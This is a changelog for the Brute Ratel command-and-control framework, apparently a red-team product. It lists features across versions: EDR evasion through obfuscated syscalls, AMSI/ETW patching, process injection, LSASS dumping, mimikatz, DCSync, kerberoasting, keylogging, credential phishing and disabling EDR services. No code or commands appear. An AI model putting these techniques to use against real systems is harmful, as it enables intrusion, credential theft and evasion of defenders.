----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Release notes for 1.0 - Sicilian Defense ====================================== Ratel Server and Badger ====================================== Additions -------------------------------------- 1. Added DNS Over HTTPs Payload and Listener 2. Added DOH debug log option. This can be used to enable or disable debug logs to validate the listener is working. The logs are append to the server logs 3. Added HTTP/HTTPS Proxy option for DOH and HTTP badgers 4. External C2 over Slack 5. Added 'detect' command to hunt userlands hooks in a user provided DLL 6. Added 'kerberoast' command and krb5decoder for decoding KRB5 ticket and converting it to hashcat 7. Added 'icmp_ping' command 8. Added 'wmiexec' command 9. Added File Explorer in Commander with SMB support 10. Updated Process Explorer with process search option and disabled sorting. Architecture of processes is also shown now 11. Preview command now uses syscall to avoid detections on opening of file handle 12. Added export profile support for click_scripts, webhook_listener, autosave, register_dll, register_pe, register_pe_inline and register_obj 13. Renamed 'wmispawn' command to 'wmiquery' 14. Riot Control supports DOH 15. Updated Mitre map Improvements -------------------------------------- 1. Updated smb pivots to reuse named pipes upon disconnection 2. The 'crisismonitor' command now shows user information on every logon event 3. Replaced Camouflage with phish_creds and removed Camouflage code from the server 4. Changed background color of Commander from #000e14 to #161a20 5. Added option to Change terminal background from BRc4 Image to black screen 6. New encrypt and sleep techniques added which are randomly switched on every sleep 7. The 'ps' and 'psgrep' command also show architecture of the process 8. Renamed Warmongers to Operators 9. Commander now saves every payload under a new name as per their payload type i.e. doh/http/smb/tcp 10. Updated loader to use new way to find the base address of the DLL in memory for reallocation 11. Updated Listener to listen on localhost ====================================== Bug Fixes ====================================== 1. Fixed crisis_monitor format output which returned extra EOF sometimes 2. Fixed a minor printing bug for ipstats 3. Fixed BOF to return null when a API/DLL is not found due to user error 4. Fixed a shellcode injection bug where artifacts were left behind sometimes. Badger auto cleans up the injected shellcode post bootstrapping 5. Fixed Sentinel and LdapSentinel output for hex values 6. Fixed spawned child process to resume thread when reflection and shellcode injection failed to work ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Release notes for 0.9 - Checkmate ====================================== Ratel Server and Badger ====================================== Additions -------------------------------------- 1. Updated multiple sleep functions to use syscalls with waitable objects 2. Upgraded kernel32 and kernelbase hunters to avoid kerneltraps 3. Updated Syscall hunter for various EDRs 4. Added 'memdump' command 5. Added 'addpriv' command 6. Added 'applist' command 7. Added 'preview' command 8. Added 'fileinfo' command 9. Added 'lookup' command 10. Disabled Control Flow Guards where not required 11. Replaced everything in the badger with Syscall Checkmate Debugger for the following: 1. NtAllocateVirtualMemory 2. NtFlushInstructionCache 3. NtProtectVirtualMemory 4. NtWriteVirtualMemory 5. NtCreateSection 6. NtMapViewOfSection 7. NtCreateThreadEx 8. NtQueueApcThread 9. NtResumeThread 10. NtAlertResumeThread 11. NtOpenProcess 12. NtSetInformationProcess 13. NtQueryInformationProcess 14. NtDuplicateObject 15. NtGetContextThread 16. NtSetContextThread 17. NtWaitForSingleObject 18. NtClose 19. NtTerminateThread 20. NtCreateEvent 21. NtSignalAndWaitForSingleObject 22. NtCreateTransaction 23. NtOpenFile 24. NtCreateFile 25. NtQuerySystemInformation 26. NtReadVirtualMemory 27. NtReadFile 28. NtQueryInformationFile ====================================== Bug Fixes ====================================== 1. Enhanced the User experience for Ldap Sentinel 2. Fixed the Ldap Sentinel bug for GUI which did not use inline injection when performing manual queries ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Release notes for 0.8.0 - Warfare Tactics ====================================== Ratel Server and Badger ====================================== Additions -------------------------------------- 1. Added webhook functionality and added a seperate function to write websockets 2. Updated loader to dynamically find obfuscated syscalls 3. Converted virtualalloc in coffexec to obfuscated syscalls 4. Coverted all reflective DLLs, Service and DLL payload generation to use obfuscated indirect syscalls 5. Added ETwTI Process Instrumentation callback patching for all loaders 5. Added 'timeloop' command to run a given command for a dedicated number of times and seconds in a loop 6. Added new process injection techniques for syscalls: set_threadex 1. NtCreateThreadEx (Obfuscated Indirect Syscalls - x64 only) 2. NtQueueApcThread, NtResumeThread (Obfuscated Indirect Syscalls - x64 only) 3. NtQueueApcThread, NtAlertResumeThread (Obfuscated Indirect Syscalls - x64 only), set_malloc 1. NtCreateSection, NtMapViewOfSection, RtlCopyMemory (Obfuscated Indirect Syscalls - x64 only) 2. NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory (Obfuscated Indirect Syscalls - x64 only)`, 7. Added feature to change malleable profiles on the fly. Modified badgers will spawn under a new identity. 8. SwitchC2 feature is removed and replaced with switch_profile 9. Added prepend and append (malleable C2 profile) Enhancements -------------------------------------- 1. Added header support for socksbridge (domain fronting) 2. Encrypted shellcode parameters with Rc4 encryption sent to the shellcode 3. Replaced sleep with WaitForSingleObjectEx ====================================== Bug Fixes ====================================== 1. Fixed rare download bug for TCP and SMB badgers 2. Fixed token vault display bug ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Release notes for 0.7 - Tsukuyomi ====================================== Ratel Server and Badger ====================================== Additions -------------------------------------- 1. Improved the Badger's loader to use NTAPIs 2. Added 'Shadowcloak' feature which was rewritten with a custom MinidumpWriteDump 3. Added sleep functionality to encrypt itself while sleeping and move the RX region to RW 4. Added 'NtCreateSection, NtMapViewOfSection, RtlCopyMemory' to set_malloc for reflective dll and shellcode execution 5. Added 'ps_ex' command 6. Added 'userinfo' command which displays user privileges and groups. Integrated 'id' and 'get_privs' command with 'userinfo' 7. Added 'scstart' command to start a local or remote service over RPC 8. Added 'patchetw' command to optionally patch ETW to disable hooks for NtQueueApcThread 9. Added 'query_session' command for remote session queries 10. Added 'local_sessions' command 11. Added 'routes' command 12. Added 'arp' command 13. Added 'netstat' command 14. Added 'shinject_ex' command 15. Added 'sharescan' command 16. Added 'schtquery' command to query detailed scheduled tasks 17. Added service description and service trigger information to 'scquery' command 18. Added 'sysinfo' and 'windowlist' commands 19. Added 'getenv' command 20. Added 'dnscache' command 21. Added 'passpol' command 22. Added 'keylogger' command 23. Added 'Sentinel' command which can perform ldap query without creating a new process 24. Added option for badgers to die if its unable to connect to the c2 - die_offline Enhancements -------------------------------------- 1. Updated 'impersonate' command to select user id instead of just usernames 2. The 'ps' command shows more detailed output with module information 3. Updated 'net' command which can now query users, groups and members of groups 4. Updated service output with proper response codes as replacement for errors 5. Replaced multiple msvcrt.dll functions with custom inline-functions 6. Updated Download file's name to append the current time and hostname from where it was downloaded in the logs directory 7. Updated Ldap Sentinel for process injection and lowered the size to 18kb instead of the earlier 38kb of RDLL 8. Added more verbosity to ratel war room 9. Replaced job counter (job-0) with new line addition for every command. The badger will seperate the output of every command by adding a line at the start and one at the end of the output 10. Updated 'drivers' command to show metadata like company name and address loaded of the driver 11. Updated formatting for 'wmispawn' command 12. Updated 'list_modules' command with company name 13. Updated MITRE graph 14. Updated 'crisis_monitor' to run as an independent thread 15. Updated 'sharpinline' to run as an independent thread 16. Added affected_cmd and supported_cmd for process injections and ppid spoofing ====================================== Bug Fixes ====================================== 1. Fixed badger count issue where logs were loading up in the same log for new connections on badger restoration 2. Fixed Dynamic finding of OpenProcess 4. Download fixed for shadowcloak over smb/tcp pivots 5. Fixed screenshot upload with domain fronting 6. Fixed some bugs in the 'ps' command 7. Fixed memory leaks for the 'download' command 8. Fixed 'samdump' bug for Server 2012 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.1.2 - Resurrection - Bug Fix ====================================== Bug Fixes ====================================== 1. Fixed a bug in sharpinline where version v2 was not working with v4 CLR. Now Both v2 and v4 dotnet code can be run in v4 CLR unlike previously where it returned an error stating v2 is not supported in v4. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.1.1 - Resurrection - Beta Feature Release ====================================== Ratel Server and Badger ====================================== 1. Added scstart command to start local and remote services using WinAPI ====================================== Bug Fixes ====================================== 1. Fixed screenshot download over fronted domain 2. Fixed process output listing for badgers which did not show other user processes sometimes 3. Removed trailing spaces in commands mistakenly added by the user in commander 4. Added automatic addition of \\ in the 'cd' command ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.1 - Resurrection - Beta Feature Release ====================================== Ratel Server and Badger ====================================== 1. Added shadowcloak feature which extracts lsass dump and reroutes the dump to server without touching disk ====================================== Bug Fixes ====================================== 1. Fixed badger count issue where logs were loading up in the same log for new connections on badger restoration ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.0.3 - Resurrection - Bug Fix ====================================== Bug Fixes ====================================== 1. Added patch to load png files instead of jpeg for badgers ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.0.2 - Resurrection - Bug Fix ====================================== Bug Fixes ====================================== 1. Fixed Crisis monitor bugs to find attached battery ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6.0.1 - Resurrection - Bug Fix ====================================== Bug Fixes ====================================== 1. Added ExitProcess to reflective dlls so that the process does not crash ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.6 - Resurrection ====================================== Commander ====================================== 1. Added random listener name generation during new listener creation 2. Added Bind IP drop down box instead of having to enter the IP manually 3. Added option to auto-select bind host as the rotational host 4. Added Payload Generation Architecture GUI support to the context menu of listener and to the payload profiler. Replaced buttons in the payload profiler with a dropdown box 5. Added search and ldapquery option directly to the badgers terminal 6. Modified help output on screen to show affected and supported cmds for every command 7. Merged Scratchpad and Operators/Chat tablewidget 8. Added dark faded colors to mark the payloads which are dead 9. Added UTC to local date conversion support for last check in and useractivity 10. Added autohide button which hides all dead badgers. Badgers marked as dead and exited will automatically be hidden when this is enabled. 11. Removed Add URI since the core listener was enhanced to allow badgers to connect to any URI, and at the same time also providing the option to filter out the response to those URIs which can be done by adding custom html pages to a URI 12. Added Load adjacent tab, exitthread and exitprocess option to the context menu of badger. 13. Modified BadgerQParser to show pending commands. Command Queue will only show the main commands in queue instead of showing the full command with the file buffer (for file uploads/sharp/ps reflects) 14. Added saving the last used folder in memory for saving files via Commander 16. Badger's terminal will show more info, unlike before which only showed the PID and BID 17. Added Export to CSV option to Useractivity. Useractivity shows MITRE mappings along with every command executed 18. Single Commander file for all types of Linux distro ====================================== Ratel Server and Badger ====================================== 1. Added position independent code for x86 2. Added x86 reflective dlls for badger modules 3. Added Token Vault feature which can store multiple stolen tokens using the 'grab_token' command 4. Added Sharpinline command to execute C sharp code without new process generation 5. Sharpreflect and Sharpinline now use a randomly generated appdomain everytime instead of the default app domain 6. Added 'coffexec' which has heavy support for Beacon Object Files of Cobaltstrike. Supported internal APIs are BadgerDispatch, BadgerDispatchW, BadgerStrlen, BadgerWcslen, BadgerMemcpy, BadgerMemset, BadgerStrcmp, BadgerWcscmp, BadgerAtoi functions. Entrypoint for coffexec is coffee 7. Added 'list_modules' command to list loaded DLLs in the current process or target process 8. Added 'list_exports' command to list exports of a given DLL 9. Added 'memhunt' command to hunt for memory regions in current or target process with any page permissions 10. Added 'suspended_run' to create a new process in a suspeneded state 11. Added 'crisis_monitor' feature which can add an event to monitor changes in power status, user login and log off for terminal session monitoring and more 12. Added 'set_killdate' and 'get_killdate' commands to auto kill badger on a given date in the RFC822 format 13. Added exit thread and exit process functionality. If a shellcode is injected in a process, the exitthread will only exit the thread and not the full process. 14. Added more detailed information on the 'ps' command (process listing) 15. Modified tcp scans to support port-range scanning and print output dynamically 16. AMSI/ETW patching will now only patch if the CLR version is 2.0. 17. Removed objexec, get/set_objexec since coffexec performs a better job at executing object files 18. Updated help with supported and affected commands 19. Added feature to mark dead badgers which do not connect back. This can be used to filter out dead badgers 20. Removed Adversary Simulations code since Clickscripts replaces the Adversary Simulation option 21. Added badger's connection notification to Socks (Boomerang) 22. During payload/rdll injection, the badger will automatically find which is the current payload type: x86 or x64 validation, and generate payload according to the architecture for injection 23. Added logging for psexec, upload and download which logs the name, path and hashes for every file uploaded or downloaded 24. Added Brute ratel sample profile generator and parser which can be used with the '-sp' command 25. Modified psreflect and sharpreflect with the new code. The newly generated code is only 30kb in size 26. Fixed 'wmispawn' example in the help options 27. Updated Go Compiler to 'go1.16.6 linux/amd64' 28. Added RC4 encryption support alongside AES256 and RSA to encrypt selected sensitive strings in memory 29. Added option in the ratel server to create sample configuration 30. Changes were make to the command registration in badger profiles. Need an additional "arch":"x64" or "arch":"x86" in the profiler to validate the type of the payload command registered 31. The 'dcsync_inject' command is now removed since there are already 'dcsync' and 'mimikatz' command, both of which can perform DCSync. ====================================== Bug Fixes ====================================== 1. Added bug-fix to change payload-profiler password when listener password is changed. 2. Fixed a bug which always showed 'regular' auth in the listeners table instead of the OTA where needed 3. Fixed download percentage bug in badgers. 4. Renamed spelling mistake of 'arguement' to 'argument' in the terminal commands ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.5.0.3 - Syndicate ====================================== Bug Fixes ====================================== 1. Fixed 'Camouflage' bug where the Camouflage was not getting injected due to changes in the PE Header 2. Fixed a bug in the 'autosave' feature which was printing 'profile not saved' even after saving the configuration file. 3. Fixed a post response bug for deauthenticated badgers and custom root page. 4. Fixed crashing of socksbridge upon taking an extremely long useragent ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.5 - Syndicate ====================================== Commander ====================================== 1. Modifed user interface to make it a smoother experience for the user. Moved Downloads, LdapSentinel, AdvSim and other UI to dock widgets. 2. Added Watchlist window for logging events, web activity, operators activity and chat window. Removed 'Archives' tab and integrated 'Downloads' and 'View Logs' tab seperately. 3. Modified user inteface for Ldap Sentinel. 4. Added Click Scripting feature to automate execution of badger commands in bulk. 5. Removed samdump, shadowclone and other one-click tasks from right click of badger since these are one-click commands which can be executed directly from the badger's terminal or from Riot Control. 6. Remapped error box popups to errors only prompting in the UI as a text. Added PowerShell payload generation capability which can be accessed from Commander's Payload profiler or by Right Clicking a listener. 7. Added Splitters to resize dock widgets. 8. Added Downloads broadcast feature. As soon as new files are downloaded, the downloads tab will popup automatically. 9. Added 'Autosave' button to automate saving of Brute Ratel's configuration file. All badger initialization information will be stored in the config file inclusive of tokens used by badgers for authentication. 10. Statistics are now moved to the bottom right part of the page ====================================== Ratel Server and Badger ====================================== 1. Added custom exported function hunter in replacement of GetProcAddress. None of the badger commands use GetProcAddress anymore. 2. Added PowerShell Payload generation capability which can be accessed from Commander's Payload profiler or by Right Clicking a listener. 3. Added 'pivot_winrm' functionality which can be used pivot across systems using winrm without dropping any payload to disk. Badgers using pivot_winrm will be executed in memory. 4. Added WMISpawn feature which can be configured to run with custom WMI namespace and user credentials to run WMI queries in memory without creating any new process. 5. Ported Ldap Sentinel from clang to mingw. Reduced the size of reflective DLL from 245 kb to 38kb in memory 6. Added 'raw query' mode for Ldap sentinel which can be used to perform raw ldap queries. 7. Ported 'mimikatz' functionality. Mimikatz can be loaded with badger's loader with stripped PE Sections to avoid detection in memory. 8. Bruteratel contains 2 customized versions of DCsync, one which uses tokens generated from passwords and one which uses process tokens. Both of them work independently from the 'mimikatz' command. 9. Added portscan functionality to scan a given host with multiple port numbers. 10. Added share enumeration feature which takes in a given hostname and can check for privileges on the host and show available shares. 11. Added AMSI patching and EtwEventWrite patching to psreflect and sharpreflect commands; Fixed dotnet CLR loading prompt for for CLR 2.0 for psreflect/sharpreflect. 12. Added new x64 Loader for RW+RX permissions. Modified Shellcode for VirtualAlloc+CreateThread. All reflective loaders were rewritten from scratch to avoid leaving any artefacts in memory. 13. Added Click Scripting feature to load commands from a json file to automate execution of badger commands in bulk. 14. Modified 'upload' command for enhanced upload speed. ====================================== Bug Fixes ====================================== 1. Fixed Regsitry query for REG_BINARY which did not return binary text response. 2. Fixed bug where 'rootpage' was unable to load custom rootpage on the base URL of a listener. 3. Fixed shellcode crashing on older windows 7 versions which did not have combase.dll. Replace combase.dll functionality from the functions in ole32.dll for windows 7, 2012 and 2008 servers. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes (minor update) for 0.4.2 - Chaos Theory ====================================== Ratel Server and Badger ====================================== 1. Brute Ratel can now block non-microsoft DLLs from loading into the injected process. The dll_block and dll_unblock can respectively enable and disable DLL blockings into remote processes. ====================================== Bug Fixes ====================================== 1. SMB pipe name in Edit Payload Profiler used to add "\\.\pipe\" automatically. In the current release, this will not be added directly. This is only for Edit Payload Profile option 2. Earlier Listener names was able to use spaces, but this broke payload profiler which did not accept spaces. From this release, the spaces in listener name will be automatically replaced with a hyphen. 3. There was a bug in the graphing script which incorrectly loaded the graphs for the listeners. This is now fixed in the current version ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Release notes for 0.4.1 - Chaos Theory ====================================== Commander ====================================== 1. Added Adversay Simulation UI to Commander. Commander can load a simulation config from a json file via ratel server to load a set of commands for simulation. A sample configuration file and artefacts for APT33 group is stored in the simulations directory 2. HTTP Payloads can be generated directly by right clicking the listener now. For every new listener created, a new payload profile will automatically be added to the payload profilers list. 3. Listener creation has a direct option to add useragent, extra headers for payload and rotational redirectors. 4. Moved listener auth to right click of listener->listener actions->view authentication. 5. Added enter button to go to next line on the username/password page and the login button now accepts enter button. ====================================== Ratel Server and Badger ====================================== 1. Added Adversary Simulation Profiler. A user can create a json based simulation profile which includes commands to simulate a threat actor 2. Added SSL keys as mandatory in the command line parser. 3. Changed the 'driver list' command to 'drivers' 4. Added several process injection and memory allocation techniques. New commands 'set_malloc/get_malloc' and 'set_threadex/get_threadex' can be used to change memory allocation and execution artefacts. - Memory Allocation for Process Injection - VirtualAllocEx, WriteProcessMemory - NtCreateSection, NtMapViewOfSection, RtlCopyMemory - Thread Execution for allocated Memory - CreateRemoteThread - RtlCreateUserThread - QueueUserAPC, ResumeThread - QueueUserAPC, NtResumeThread - QueueUserAPC, NtAlertResumeThread - NtQueueApcThread, ResumeThread - NtQueueApcThread, NtResumeThread - NtQueueApcThread, NtAlertResumeThread 5. Added 'scdivert' feature which can change the service binary path for an existing service. EDRs service configuration can be changed and the system can be rebooted to disable EDRs altogether. This will only work for those EDRs which do not hook their own registry to look for changes 6. Added 'psgrep' feature which can search a process from process list and only return a specific process. The 'ps' command still exists if you want to take a look at all processes. This feature was added to quickly search for a process and inject a shellcode/payload config to that. 7. Added 'ipstats' feature which returns a more detailed output than 'ipconfig' of windows. This command returns network related information including names of VPN adapters, their IP addresses, gateways and other DNS/Adapter information. 8. Added contact_harvester command to extract and dump contacts from Outlook's Global Address List. 9. Updated server conf sample profile to server_confs folder 10. Creating a new listener via profile file or via GUI will now automatically create a payload profile for the same listener. 11. Brute Ratel is now built for kali and ubuntu seperately since kali has the latest C++ libraries. You find both the versions in the Brute Ratel directory with the same naming convention. ====================================== Bug Fixes ====================================== 1. Fixed Android Handler bug to read Unicode output from the websocket of ratel server 2. Fixed Commander Handler bug to read Unicode output from the websocket of ratel server 3. Fixed Ratel Server's bug to read Unicode output from the HTTP request of badgers 4. Fixed error handling for the ratel server. Parses input in a more optimized and a faster way. 5. Fixed ratel server crash for error handling.